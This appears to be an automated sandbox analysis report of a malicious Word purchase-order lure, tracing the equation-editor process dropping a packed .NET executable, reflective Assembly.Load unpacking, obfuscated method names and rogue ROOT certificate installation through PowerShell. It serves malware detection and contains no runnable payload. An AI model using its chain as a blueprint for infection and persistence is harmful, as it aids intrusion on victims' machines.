Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: Thyssenkrupp PO040232.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Thyssenkrupp PO040232.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation

.NET source code contains potential unpacker

Source: XcsQpLjhNNvxYtrw[1].exe.2.dr, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: hgqilegacy20306.exe.2.dr, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	.Net Code: Y0SUwLXjc4 System.Reflection.Assembly.Load(byte[])
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	.Net Code: Y0SUwLXjc4 System.Reflection.Assembly.Load(byte[])
Source: 5.2.hgqilegacy20306.exe.221582c.3.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 5.2.hgqilegacy20306.exe.2266ca8.2.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 5.2.hgqilegacy20306.exe.221ee44.5.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 5.2.hgqilegacy20306.exe.22702c0.4.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 5.2.hgqilegacy20306.exe.680000.0.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002A7236 push esp; iretd	2_2_002A723D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0029E000 push ebp; ret	2_2_0029E193
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002AC878 push 00000037h; iretd	2_2_002AC885
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002AC2A0 pushfd ; retn 002Ah	2_2_002AC2A1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002AC29A pushfd ; retn 002Ah	2_2_002AC29D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002AC362 push 68002AC3h; ret	2_2_002AC36D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002ABD4C pushad ; retf	2_2_002ABEB5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0029E194 push ebp; ret	2_2_0029E193
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0029E194 push ebp; ret	2_2_0029E46F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002A55DF push esp; iretd	2_2_002A55E1
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_00235FF8 pushad ; retf	5_2_00235FF9
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_002521D8 push ebx; iretd	8_2_002521EA
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_005F90F8 pushfd ; retn 0055h	8_2_005F90F9

Source: XcsQpLjhNNvxYtrw[1].exe.2.dr	Static PE information: section name: .text entropy: 7.880526514779496
Source: hgqilegacy20306.exe.2.dr	Static PE information: section name: .text entropy: 7.880526514779496

Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, B5htBfs6Eq60LvMyWr.cs	High entropy of concatenated method names: 'w57qscG8RD', 'x7YqmqC8Eh', 'ocGqkZwtlW', 'YEOkZu65Z3', 'WuCkzB7aRn', 'PLdqFVe9nq', 'or2qBxUlFK', 'ECFqWpjDeU', 'mh8qrHFT6u', 'u7gqUiT0Rl'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, bmncYvqpj1lkAkdaQY.cs	High entropy of concatenated method names: 'Dispose', 'IcXBCLO8dK', 'OprWH8BmSy', 'qyxVVUCACc', 'rWyBZKWZOd', 'ca6BzUmIwp', 'ProcessDialogKey', 'bvsWFFNFRT', 'pHJWB2uDHa', 'vNdWWWcIPj'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, Kfn4gOm6qJR5uQnJ51.cs	High entropy of concatenated method names: 'Cev1B8FA1K', 'C0x1rEctfk', 'lt51UPv0iK', 'g8U1sCb5y0', 'UpQ1IT9URT', 'PXW1yMqku4', 'qL41kVLh3p', 'DaaPoI8YYe', 'HXwPiaOwJN', 'kIBPCnQAKB'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, cTP0ujQ4unMvfM1Q7j.cs	High entropy of concatenated method names: 'T1tuM2V1Z1', 'tmdu3YGU3n', 'r5juGdGarH', 'fBeuHNSPOs', 'reouhLNGS1', 'Tfuu2pAZ9V', 'OlLuE1IDtm', 'u4wundyhXV', 'LZbufJtWM4', 'qUeupD3qq4'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, pCZRiIVyb8gQ36Jscb.cs	High entropy of concatenated method names: 'Cuaq78BXpo', 'eJfq6HMgjS', 'eoNqwvC5rd', 'n9yqNy8V1U', 'D6pqacncpB', 'L0hqgFOoqt', 'dNsqt7eiIE', 'XZWqMtoxh1', 'kC0q3op3cR', 'mYHqYYn5rP'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, cwSp48wlWmdkLMUbRn.cs	High entropy of concatenated method names: 'YEXQiOCpha', 'TaqQZDtBtO', 'DHuPFXYXjy', 'viIPBQ1KGj', 'cX1QpIeU2M', 'P5VQ8MFB9k', 'sU5QLhT4MT', 'yyFQKj8KlP', 'bLLQDB4jdj', 'z3kQ4fxAmt'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, zgULROdx53FtcVdxrb.cs	High entropy of concatenated method names: 'ljHQAuITy9', 'uQMQOvu2MZ', 'ToString', 'aUcQsRUM9K', 'mpVQIWvX1f', 'qFoQm70Zmc', 'mObQyEmfyW', 'hWRQkbnxa3', 'VjFQqVyDSd', 'W3AQvtY0ew'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, UYIMtqoPLcKSuPT8Sm.cs	High entropy of concatenated method names: 'goMIKEWGeg', 'u26IDOFC3S', 'SnuI4VSAbs', 'LY3ITX53PE', 'xDIIxvDqFd', 'UDZIXBCEAA', 'gpGIoKANAZ', 'oGXIijDnAf', 'fn7ICD14NO', 'SnGIZk8esT'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, og6JZM7vcsSTvWXxUG.cs	High entropy of concatenated method names: 'ERRwaHVGW', 'PWUNOYQMo', 'c53gwwlZD', 'TBcta9ZMg', 'gq33w8AIW', 'y8VYB2MGO', 'Q4IiSUo47JKLSEiFBd', 'tMW6m9FUrVTGaqjil8', 'kfvPKDh1i', 'tmveCGFjw'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, v0c3BnzsGGvxHTnpZq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ebs1uHhiHO', 'Hao1cAbcfb', 'qIQ1bOZDPP', 'LAK1QZBWWy', 'xtq1PwkA1O', 'upK11Rdb9c', 'nFG1eGPsy9'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, EiI4J1gsgEpvMUVeIr.cs	High entropy of concatenated method names: 'AvVPsX52Xk', 'yrFPIWsbO7', 'BAaPmY3Ysn', 'sHgPyxNyah', 'q6NPkkUymK', 'gtWPqQlQJ5', 'lI6Pvd2pri', 'kfCP5aipUr', 'deBPAnUgV8', 'pGJPOgxdv9'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, sstE2rE2FHbpyWHeil.cs	High entropy of concatenated method names: 'QyLmN1trIt', 'bpAmgpjF07', 'rCPmMshCaO', 'wHXm3naUdw', 'mLOmctTHPM', 'Y28mbJCZwg', 'K8AmQI3Vew', 'ua0mPakMIA', 'DZtm1LESoN', 's44menTDNP'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, dVbdYWjrJy6D8mXC3HN.cs	High entropy of concatenated method names: 'V0V17Lrlsa', 'euF16Ff0Ws', 'SJg1wE6CU3', 'ArE1NvZ53S', 'S9o1aHDwXA', 'yhN1gmsQqN', 'gY41tOkoUB', 'i2A1MoedVd', 'K3K13jXEU6', 'njl1Y3ePZB'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, k1ljfRRekjotoW2QGo.cs	High entropy of concatenated method names: 'FH4PGlZaS4', 'xw5PHprckX', 'E6jPd7le3e', 'JfFPh1JS7a', 'sk0PKqpjXb', 'IC5P2h3Fed', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, QnUNhefD2F9UwihjTT.cs	High entropy of concatenated method names: 'efnBqqGBAg', 'uFsBvZt3pj', 'jfNBA97M80', 'lNdBOwyOyj', 'TYwBc7RaWT', 's9gBbTrNPs', 'OT7orF2AP6v02ilR6u', 'j2qM2nWYESVyEb63hP', 'NHOBBsq2Id', 'VatBr5BoRF'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, oQbKyJ809BxJXn8WyT.cs	High entropy of concatenated method names: 'uAkcfwODai', 'NA0c8UgXma', 'ceTcKs6tNl', 'VyicDsKdUH', 'COlcHigPv8', 'UDvcdL9lZC', 'FSmchVySOJ', 'lL0c2ICxRt', 'EMucSwlaBF', 'UdGcEhr5Ib'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, cbW82iCn8DJ8wSMm2p.cs	High entropy of concatenated method names: 'SffkjgIaHA', 'oGNkI1yC23', 'FrwkyIg9rg', 'C09kqjqZWP', 'zKSkv2RVO1', 'ojiyxa0NDh', 'ta1yXA9HnP', 'lipyoDg95t', 'w7yyi3U0mb', 'uf9yCgcbOx'
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	High entropy of concatenated method names: 'U3qrjQn2sV', 'OberstitGJ', 'jcUrI6B4Nf', 'r78rm95Los', 'GNsryCi5JM', 'xOHrkpPH0f', 'k1IrqCk1BV', 'HPnrvB3xHG', 'y8Jr5oG57U', 'natrAMMtBj'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, B5htBfs6Eq60LvMyWr.cs	High entropy of concatenated method names: 'w57qscG8RD', 'x7YqmqC8Eh', 'ocGqkZwtlW', 'YEOkZu65Z3', 'WuCkzB7aRn', 'PLdqFVe9nq', 'or2qBxUlFK', 'ECFqWpjDeU', 'mh8qrHFT6u', 'u7gqUiT0Rl'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, bmncYvqpj1lkAkdaQY.cs	High entropy of concatenated method names: 'Dispose', 'IcXBCLO8dK', 'OprWH8BmSy', 'qyxVVUCACc', 'rWyBZKWZOd', 'ca6BzUmIwp', 'ProcessDialogKey', 'bvsWFFNFRT', 'pHJWB2uDHa', 'vNdWWWcIPj'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, Kfn4gOm6qJR5uQnJ51.cs	High entropy of concatenated method names: 'Cev1B8FA1K', 'C0x1rEctfk', 'lt51UPv0iK', 'g8U1sCb5y0', 'UpQ1IT9URT', 'PXW1yMqku4', 'qL41kVLh3p', 'DaaPoI8YYe', 'HXwPiaOwJN', 'kIBPCnQAKB'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, cTP0ujQ4unMvfM1Q7j.cs	High entropy of concatenated method names: 'T1tuM2V1Z1', 'tmdu3YGU3n', 'r5juGdGarH', 'fBeuHNSPOs', 'reouhLNGS1', 'Tfuu2pAZ9V', 'OlLuE1IDtm', 'u4wundyhXV', 'LZbufJtWM4', 'qUeupD3qq4'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, pCZRiIVyb8gQ36Jscb.cs	High entropy of concatenated method names: 'Cuaq78BXpo', 'eJfq6HMgjS', 'eoNqwvC5rd', 'n9yqNy8V1U', 'D6pqacncpB', 'L0hqgFOoqt', 'dNsqt7eiIE', 'XZWqMtoxh1', 'kC0q3op3cR', 'mYHqYYn5rP'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, cwSp48wlWmdkLMUbRn.cs	High entropy of concatenated method names: 'YEXQiOCpha', 'TaqQZDtBtO', 'DHuPFXYXjy', 'viIPBQ1KGj', 'cX1QpIeU2M', 'P5VQ8MFB9k', 'sU5QLhT4MT', 'yyFQKj8KlP', 'bLLQDB4jdj', 'z3kQ4fxAmt'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, zgULROdx53FtcVdxrb.cs	High entropy of concatenated method names: 'ljHQAuITy9', 'uQMQOvu2MZ', 'ToString', 'aUcQsRUM9K', 'mpVQIWvX1f', 'qFoQm70Zmc', 'mObQyEmfyW', 'hWRQkbnxa3', 'VjFQqVyDSd', 'W3AQvtY0ew'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, UYIMtqoPLcKSuPT8Sm.cs	High entropy of concatenated method names: 'goMIKEWGeg', 'u26IDOFC3S', 'SnuI4VSAbs', 'LY3ITX53PE', 'xDIIxvDqFd', 'UDZIXBCEAA', 'gpGIoKANAZ', 'oGXIijDnAf', 'fn7ICD14NO', 'SnGIZk8esT'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, og6JZM7vcsSTvWXxUG.cs	High entropy of concatenated method names: 'ERRwaHVGW', 'PWUNOYQMo', 'c53gwwlZD', 'TBcta9ZMg', 'gq33w8AIW', 'y8VYB2MGO', 'Q4IiSUo47JKLSEiFBd', 'tMW6m9FUrVTGaqjil8', 'kfvPKDh1i', 'tmveCGFjw'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, v0c3BnzsGGvxHTnpZq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ebs1uHhiHO', 'Hao1cAbcfb', 'qIQ1bOZDPP', 'LAK1QZBWWy', 'xtq1PwkA1O', 'upK11Rdb9c', 'nFG1eGPsy9'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, EiI4J1gsgEpvMUVeIr.cs	High entropy of concatenated method names: 'AvVPsX52Xk', 'yrFPIWsbO7', 'BAaPmY3Ysn', 'sHgPyxNyah', 'q6NPkkUymK', 'gtWPqQlQJ5', 'lI6Pvd2pri', 'kfCP5aipUr', 'deBPAnUgV8', 'pGJPOgxdv9'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, sstE2rE2FHbpyWHeil.cs	High entropy of concatenated method names: 'QyLmN1trIt', 'bpAmgpjF07', 'rCPmMshCaO', 'wHXm3naUdw', 'mLOmctTHPM', 'Y28mbJCZwg', 'K8AmQI3Vew', 'ua0mPakMIA', 'DZtm1LESoN', 's44menTDNP'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, dVbdYWjrJy6D8mXC3HN.cs	High entropy of concatenated method names: 'V0V17Lrlsa', 'euF16Ff0Ws', 'SJg1wE6CU3', 'ArE1NvZ53S', 'S9o1aHDwXA', 'yhN1gmsQqN', 'gY41tOkoUB', 'i2A1MoedVd', 'K3K13jXEU6', 'njl1Y3ePZB'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, k1ljfRRekjotoW2QGo.cs	High entropy of concatenated method names: 'FH4PGlZaS4', 'xw5PHprckX', 'E6jPd7le3e', 'JfFPh1JS7a', 'sk0PKqpjXb', 'IC5P2h3Fed', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, QnUNhefD2F9UwihjTT.cs	High entropy of concatenated method names: 'efnBqqGBAg', 'uFsBvZt3pj', 'jfNBA97M80', 'lNdBOwyOyj', 'TYwBc7RaWT', 's9gBbTrNPs', 'OT7orF2AP6v02ilR6u', 'j2qM2nWYESVyEb63hP', 'NHOBBsq2Id', 'VatBr5BoRF'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, oQbKyJ809BxJXn8WyT.cs	High entropy of concatenated method names: 'uAkcfwODai', 'NA0c8UgXma', 'ceTcKs6tNl', 'VyicDsKdUH', 'COlcHigPv8', 'UDvcdL9lZC', 'FSmchVySOJ', 'lL0c2ICxRt', 'EMucSwlaBF', 'UdGcEhr5Ib'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, cbW82iCn8DJ8wSMm2p.cs	High entropy of concatenated method names: 'SffkjgIaHA', 'oGNkI1yC23', 'FrwkyIg9rg', 'C09kqjqZWP', 'zKSkv2RVO1', 'ojiyxa0NDh', 'ta1yXA9HnP', 'lipyoDg95t', 'w7yyi3U0mb', 'uf9yCgcbOx'
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	High entropy of concatenated method names: 'U3qrjQn2sV', 'OberstitGJ', 'jcUrI6B4Nf', 'r78rm95Los', 'GNsryCi5JM', 'xOHrkpPH0f', 'k1IrqCk1BV', 'HPnrvB3xHG', 'y8Jr5oG57U', 'natrAMMtBj'
Source: 5.2.hgqilegacy20306.exe.221582c.3.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 5.2.hgqilegacy20306.exe.2266ca8.2.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 5.2.hgqilegacy20306.exe.221ee44.5.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 5.2.hgqilegacy20306.exe.22702c0.4.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 5.2.hgqilegacy20306.exe.680000.0.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
